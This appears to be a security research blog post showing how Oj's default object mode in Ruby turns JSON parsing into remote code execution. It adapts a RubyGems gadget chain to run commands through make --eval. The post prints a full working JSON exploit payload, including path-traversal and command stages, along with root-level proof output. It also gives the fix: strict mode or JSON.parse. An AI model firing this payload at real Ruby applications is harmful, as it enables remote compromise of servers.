Modifying the Ruby Oj.load Gadget Chain

Oj is the most popular high-performance JSON parser for Ruby, with over 170 million downloads. It's fast, well-maintained, and everywhere in production Rails apps. It's also, in its default configuration, a deserialization vulnerability.

A single Oj.load(user_input), with no flags and no explicit unsafe configuration, will instantiate arbitrary Ruby objects from JSON. Any endpoint that parses untrusted JSON through Oj's default mode is one crafted payload away from remote code execution.

Ruby deserialization has always been interesting to me, and I wanted to understand Oj's object mode well enough to build a gadget chain hands-on. There's already a known universal chain that achieves RCE through zip -TT. What I ended up with is a minor tweak to that same chain, swapping zip for make as the command execution sink. Nothing groundbreaking here, just notes from a learning exercise.

Background

Ruby developers generally know not to call Marshal.load or YAML.load on untrusted input. Those are documented footguns.

Oj doesn't trigger the same alarm bells. It's a JSON parser. JSON is a data interchange format: strings, numbers, booleans, arrays, objects. You expect hashes and arrays out the other end, not live Ruby objects.

That expectation is wrong when Oj operates in its default mode.

Object Mode

Oj supports several parsing modes: :strict, :null, :compat, :rails, :custom, and :object. The default, the one you get if you just call Oj.load, is :object. In this mode, Oj recognizes special JSON keys that tell it to instantiate Ruby classes:

^o - create an instance of the named class and set its instance variables
^c - reference a class object (the class itself, not an instance)
^#N - create a hash with non-string keys (N is the pair index)

In practice:

require "oj"

result = Oj.load('{"^o":"OpenStruct","table":{"admin":true}}')
# => #<OpenStruct admin=true>

result.class   # => OpenStruct
result.admin   # => true

That JSON string produced a real OpenStruct instance. Not a hash with a ^o key. An actual Ruby object with instance variables set.

How Oj constructs these objects matters:

[Figure: Oj object construction vs normal Ruby]

At the C level, Oj calls allocate() to create a blank instance, then rb_ivar_set() to assign instance variables directly. It never calls initialize, never calls marshal_load, never calls any Ruby-level constructor or validation.
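A minimal pure-Ruby sketch of that construction path. Account is a hypothetical class invented for this example (it is not part of Oj or any library), and instance_variable_set stands in for the C-level rb_ivar_set():

```ruby
# Hypothetical class whose constructor validates its input.
class Account
  attr_reader :role

  def initialize(role)
    raise ArgumentError, "unknown role: #{role}" unless %w[user guest].include?(role)
    @role = role
  end
end

# Normal construction goes through initialize, so the validation runs.
begin
  Account.new("admin")
rescue ArgumentError => e
  normal_error = e.message
end

# allocate + ivar set never calls initialize, so nothing is checked.
forged = Account.allocate
forged.instance_variable_set(:@role, "admin")

puts normal_error  # => unknown role: admin
puts forged.role   # => admin
```

The forged object is indistinguishable from a legitimately constructed one as far as later code is concerned, which is what makes the bypass useful to a gadget chain.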

The Trigger

Object instantiation alone isn't enough for RCE. You need a method call or side effect to fire during parsing, before the application touches the result.

^#N creates hashes with non-string keys:

Oj.load('{"^#1": [1, "one"]}')
# => {1 => "one"}

When Ruby inserts an object as a hash key, it calls .hash on that object to compute its bucket. If the key is an Array, Array#hash calls .hash on each element. This happens inside Oj.load itself, while the hash table is being built during deserialization.

So: put an Array as a hash key via ^#1, fill it with gadget objects, and Array#hash calls .hash on each one in sequence. No application code runs. The RCE fires during Oj.load before it returns.

[Figure: Trigger mechanism: Array#hash fan-out]

One thing that tripped me up: ^#N only supports a single key-value pair. {"^#1": [key, value]} works. {"^#2": [k1, v1, k2, v2]} throws Oj::ParseError. You pack all your gadgets into one Array key and let Array#hash fan them out.
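The fan-out can be observed without Oj at all. In this sketch, Probe is a hypothetical stand-in for a gadget object; it only records that its hash method was called:

```ruby
# Hypothetical stand-in for a gadget: it logs every call to #hash.
class Probe
  LOG = []

  def initialize(name)
    @name = name
  end

  def hash
    LOG << @name
    @name.hash
  end
end

# One Array holding several "gadgets", used as a single hash key.
key = [Probe.new("stage0"), Probe.new("stage1"), Probe.new("stage2")]

table = {}
table[key] = "any"  # inserting the key is the only operation performed

p Probe::LOG  # => ["stage0", "stage1", "stage2"]
```

No method was called on the probes explicitly. The insertion alone hashed the Array, which in turn hashed each element in index order.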

The Existing Chain: zip -TT

The current universal gadget chain comes from GitHubSecurityLab's ruby-unsafe-deserialization research. It uses RubyGems classes, which ship with every Ruby installation. No additional gems needed beyond Oj.

The call chain through RubyGems internals:

Array#hash
  -> Gem::Requirement#hash
    -> walks @requirements
      -> Gem::RequestSet::Lockfile#to_s
        -> #add_GIT
          -> Gem::Source::Git#rev_parse
            -> Gem::Util.popen(@git, "rev-parse", @reference)
              -> IO.popen(["zip", "rev-parse", "-TmTT=<shell command>"])

Gem::Source::Git#rev_parse is meant to call git rev-parse to resolve a Git reference. But Oj lets us set @git to any string. Set it to "zip", and rev_parse calls Gem::Util.popen("zip", "rev-parse", @reference). The zip binary's -TT flag runs an arbitrary shell command, originally intended for testing archive integrity.
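To make the shape of the chain easier to follow, here is a toy model of it. The Toy* classes are invented for illustration and are not the real Gem:: classes; the rule that hashing stringifies the operand of a "~>" requirement is my reading of why the payload uses that operator, so treat it as an assumption. Nothing is executed: the toy rev_parse only records the argv it would have passed on.

```ruby
# Toy stand-in for Gem::Source::Git. It records the argv instead of running it.
class ToyGitSource
  attr_reader :recorded_argv

  def initialize(git, reference)
    @git = git
    @reference = reference
    @recorded_argv = []
  end

  def rev_parse
    @recorded_argv << [@git, "rev-parse", @reference]
    "0000000" # placeholder revision
  end
end

# Toy stand-in for Gem::RequestSet::Lockfile: rendering needs the revision.
class ToyLockfile
  def initialize(source)
    @source = source
  end

  def to_s
    "GIT\n  revision: #{@source.rev_parse}\n"
  end
end

# Toy stand-in for Gem::Requirement: hashing stringifies "~>" operands.
class ToyRequirement
  def initialize(requirements)
    @requirements = requirements
  end

  def hash
    @requirements.map { |op, v| op == "~>" ? [op, v.to_s] : [op, v] }.hash
  end
end

source = ToyGitSource.new("zip", "-TmTT=<shell command>")
gadget = ToyRequirement.new([["~>", ToyLockfile.new(source)]])

table = {}
table[[gadget]] = "any" # hashing the Array key walks the whole chain

p source.recorded_argv
# => [["zip", "rev-parse", "-TmTT=<shell command>"]]
```

Every step is an ordinary method doing its ordinary job. The attacker's only contribution is choosing which objects sit in which instance variables.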

The payload has two stages. Stage 1 creates a cache directory that Gem::Source::Git expects to exist (via a Gem::Source + URI::HTTP path traversal). Stage 2 fires the actual command through zip. Both stages are elements of the same Array key, so Array#hash triggers them in sequence within a single Oj.load call.

$ docker run oj-poc

/tmp/oj_universal_proof: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:...

The command cat /etc/passwd > /tmp/oj_universal_proof ran as root inside the container, triggered by nothing more than parsing a JSON string.

Swapping the Sink: make --eval

Getting to the make variant took a few wrong turns.

Dead End: ERB

First thing I tried was ERB. Oj can create an ERB instance and set @src to arbitrary Ruby code. Marshal can't do this at all; Marshal.dump on an ERB raises TypeError: singleton class can't be dumped. If you could trigger ERB#result, you'd get eval(@src) with whatever code you wanted.

Oj can create the object:

erb = Oj.load('{"^o":"ERB","src":"system(\'id\')"}')
erb.instance_variable_get(:@src)  # => "system('id')"

But ERB#result has a guard:

def result(b=new_toplevel)
  unless @_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  eval(@src, b, (@filename || '(erb)'), @lineno)
end

It checks that @_init is ERB.singleton_class. Oj's ^c syntax can give you the class ERB, but ERB.equal?(ERB.singleton_class) is false. They're different objects. There's no way in Oj's JSON syntax to reference a class's singleton class. Dead end.
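The guard can be reproduced in isolation. GuardedTemplate below is a hypothetical class that copies the shape of the check; it is not ERB, and it returns a string instead of calling eval:

```ruby
# Hypothetical class mirroring the @_init guard.
class GuardedTemplate
  def initialize(src)
    @src = src
    @_init = self.class.singleton_class
  end

  def result
    unless @_init.equal?(self.class.singleton_class)
      raise ArgumentError, "not initialized"
    end
    "would evaluate: #{@src}"
  end
end

# A class and its singleton class are different objects.
puts GuardedTemplate.equal?(GuardedTemplate.singleton_class) # => false

# Forge an instance the way a deserializer would, giving @_init the best
# value a plain class reference can supply: the class itself.
forged = GuardedTemplate.allocate
forged.instance_variable_set(:@src, "system('id')")
forged.instance_variable_set(:@_init, GuardedTemplate)

guard_message =
  begin
    forged.result
  rescue ArgumentError => e
    e.message
  end
puts guard_message # => not initialized

# Marshal cannot carry the singleton class either, so dumping fails.
marshal_error =
  begin
    Marshal.dump(GuardedTemplate.new("x"))
  rescue TypeError => e
    e.message
  end
puts marshal_error
```

The guard works because the one value it accepts cannot be named from serialized data, whether that data is JSON or a Marshal stream.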

I also looked for "bridge" classes, objects whose .hash or .to_s would call send or method_missing in a way that could bounce to ERB#result. Explored DRb::DRbUnknown, Bundler::Lockfile, UncaughtThrowError. Nothing panned out.

The make --eval Sink

What did work was swapping the command execution sink while keeping the same gadget chain up to Gem::Source::Git#rev_parse.

[Figure: Sink swap: zip -TT vs make --eval]

rev_parse calls:

Gem::Util.popen(@git, "rev-parse", @reference)
# which becomes:
IO.popen([@git, "rev-parse", @reference])

With @git = "make" and a crafted @reference:

IO.popen(["make", "rev-parse", "--eval=rev-parse:\n\t-id > /tmp/proof"])

GNU make's --eval flag accepts inline Makefile rules. The value rev-parse:\n\t-id > /tmp/proof (literal newline and tab) defines:

rev-parse:
	-id > /tmp/proof

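The target name rev-parse matches the goal that make receives as its first argument (the second element of the popen array), so make evaluates this rule and runs the recipe. The leading - tells make to ignore a non-zero exit status from the command.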
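The trick depends on the newline and tab reaching the child process untouched. A small sketch of why they do: array-form IO.popen skips the shell, so each element arrives as one argument. The child here is the current Ruby interpreter echoing its last argument back, not make, so nothing from the payload runs.

```ruby
require "rbconfig"

# The reference value from the text: "--eval=" plus a one-rule Makefile.
rule = "rev-parse:\n\t-id > /tmp/proof"
reference = "--eval=#{rule}"

# Same shape as the argv rev_parse builds when @git is "make".
make_argv = ["make", "rev-parse", reference]

# Stand-in child process: Ruby prints the last argument it received.
# The "--" ends Ruby's own option parsing so "--eval=..." is treated as data.
echo_argv = [RbConfig.ruby, "-e", "print ARGV.last", "--", *make_argv.drop(1)]
received = IO.popen(echo_argv, &:read)

puts received == reference # => true
puts rule.lines.length     # => 2
```

Because there is no shell in between, no quoting or escaping is needed for the control characters, and the two lines of the rule arrive as a single argument.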

The full payload:

{
  "^#1": [
    [
      // Element 0: trigger Gem autoloads
      {"^c": "Gem::SpecFetcher"},

      // Element 1 (Stage 1): create the cache directory via path traversal
      {"^o": "Gem::Requirement", "requirements": [
        ["~>", {"^o": "Gem::RequestSet::Lockfile",
          "set": {"^o": "Gem::RequestSet",
            "sorted_requests": [
              {"^o": "Gem::Resolver::IndexSpecification",
                "name": "name",
                "source": {"^o": "Gem::Source",
                  "uri": {"^o": "URI::HTTP",
                    "path": "/",
                    "scheme": "s3",
                    "host": "rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz?",
                    "port": "/../../../../../../../../../../../../../../../tmp/cache/bundler/git/any-c5fe0200d1c7a5139bd18fd22268c4ca8bf45e90/",
                    "user": "user",
                    "password": "password"
                  },
                  "update_cache": true
                }
              }
            ]
          },
          "dependencies": []
        }]
      ]},

      // Element 2 (Stage 2): RCE via make --eval
      {"^o": "Gem::Requirement", "requirements": [
        ["~>", {"^o": "Gem::RequestSet::Lockfile",
          "set": {"^o": "Gem::RequestSet",
            "sorted_requests": [
              {"^o": "Gem::Resolver::SpecSpecification",
                "spec": {"^o": "Gem::Resolver::GitSpecification",
                  "source": {"^o": "Gem::Source::Git",
                    "git": "make",
                    "reference": "--eval=rev-parse:\n\t-id > /tmp/proof",
                    "root_dir": "/tmp",
                    "repository": "any",
                    "name": "any"
                  },
                  "spec": {"^o": "Gem::Resolver::Specification",
                    "name": "name",
                    "dependencies": []
                  }
                }
              }
            ]
          },
          "dependencies": []
        }]
      ]}
    ],
    "any"
  ]
}

The outer ^#1 creates a hash with a non-string key. The key is the inner Array. When Ruby hashes this Array, it calls .hash on each element in order: element 0 loads the Gem classes, element 1 creates the cache directory through a URI::HTTP path traversal, element 2 fires Gem::Source::Git#rev_parse with @git = "make".

The \n\t in the reference field are JSON escape sequences, which Oj decodes into an actual newline and tab while parsing the string. By the time the value reaches IO.popen, make sees a valid inline rule definition.
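The decoding step can be checked with Ruby's standard json library as a stand-in. That Oj handles \n and \t inside strings the same way is an assumption here, though it is what any JSON parser is required to do:

```ruby
require "json"

# Single quotes keep the backslashes, so the parser sees the two-character
# escapes \n and \t, just as it would in a payload read from a request body.
raw = '{"reference":"--eval=rev-parse:\n\t-id > /tmp/proof"}'

reference = JSON.parse(raw).fetch("reference")

puts raw.include?("\n")          # => false (no real newline in the raw text)
puts reference.include?("\n\t")  # => true  (the parser produced newline + tab)
```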

$ docker run oj-poc ruby exploit_new_chain.rb

/tmp/oj_make_chain_proof:
uid=0(root) gid=0(root) groups=0(root)

make ships by default in the standard Ruby Docker images as part of the build toolchain. zip doesn't.

Oj vs Marshal: The Bypass Angle

Because Oj constructs objects via allocate() + rb_ivar_set() at the C level, it sidesteps any defense that lives in a Ruby-level constructor or marshal_load hook.

Gem::Version validates its input in initialize:

Gem::Version.new("not_a_version!!!")
# => ArgumentError: Malformed version number string not_a_version!!!

And marshal_load calls initialize, so Marshal deserialization hits the same validation:

def marshal_load(array)
  initialize array[0]
end

Oj skips both:

v = Oj.load('{"^o":"Gem::Version","version":"anything_goes_!!!"}')
v.instance_variable_get(:@version)
# => "anything_goes_!!!"

No error. The ivar is set to whatever was in the JSON.
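The three paths can be compared side by side without Oj installed. In this sketch, allocate plus instance_variable_set approximates what object mode does, and marshal_load is called directly rather than through a crafted Marshal stream:

```ruby
require "rubygems"

# Constructor path: validation rejects the string.
new_error =
  begin
    Gem::Version.new("not_a_version!!!")
  rescue ArgumentError => e
    e.class
  end

# Marshal path: marshal_load funnels into the same validation.
marshal_error =
  begin
    Gem::Version.allocate.marshal_load(["not_a_version!!!"])
  rescue ArgumentError => e
    e.class
  end

# allocate + ivar set: no validation is ever reached.
forged = Gem::Version.allocate
forged.instance_variable_set(:@version, "anything_goes_!!!")

p new_error                                # => ArgumentError
p marshal_error                            # => ArgumentError
p forged.instance_variable_get(:@version)  # => "anything_goes_!!!"
```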

Same story with ERB. Marshal can't even serialize it. Marshal.dump(ERB.new("test")) raises TypeError. But Oj creates an ERB instance with @src set to arbitrary code without blinking. The @_init guard in ERB#result prevents direct exploitation (as I found out), but the point is that Oj creates objects Marshal fundamentally cannot, with arbitrary ivar values. Any class that adds marshal_load guards as mitigation is not protected against Oj.

Running It

The whole PoC is one Ruby file and a Dockerfile:

FROM ruby:3.3
RUN gem install oj
WORKDIR /poc
COPY exploit.rb .
CMD ["ruby", "exploit.rb"]

docker build -t oj-poc .
docker run oj-poc

The fix is Oj.load(data, mode: :strict), Oj.safe_load(data), or just JSON.parse(data).
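As a sketch of the safe outcome, here is the earlier OpenStruct payload run through the standard library's JSON.parse. The helper name parse_untrusted is hypothetical; in an app that keeps Oj, its body would be Oj.load(json_text, mode: :strict) instead:

```ruby
require "json"

# Hypothetical helper: the single place where untrusted JSON gets parsed.
def parse_untrusted(json_text)
  JSON.parse(json_text)
end

payload = '{"^o":"OpenStruct","table":{"admin":true}}'
result = parse_untrusted(payload)

p result.class  # => Hash
p result["^o"]  # => "OpenStruct"
```

The ^o key comes back as an ordinary string key in an ordinary Hash. Routing every untrusted parse through one helper also makes the call-site audit a matter of grepping for direct Oj.load calls.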

Oj's default mode turns JSON parsing into arbitrary object deserialization. This isn't a bug; it's documented behavior. But it violates a reasonable expectation that parsing JSON gives you data, not live objects.

Both chains shown here use only Ruby's standard library and RubyGems. No extra gems needed on the target. The make --eval variant shows that blocking the known zip -TT sink doesn't help. The attack surface is the deserialization primitive itself. As long as Oj.load instantiates arbitrary objects, there will be chains to find.

If you use Oj, audit every call site. If it touches untrusted data, pass mode: :strict.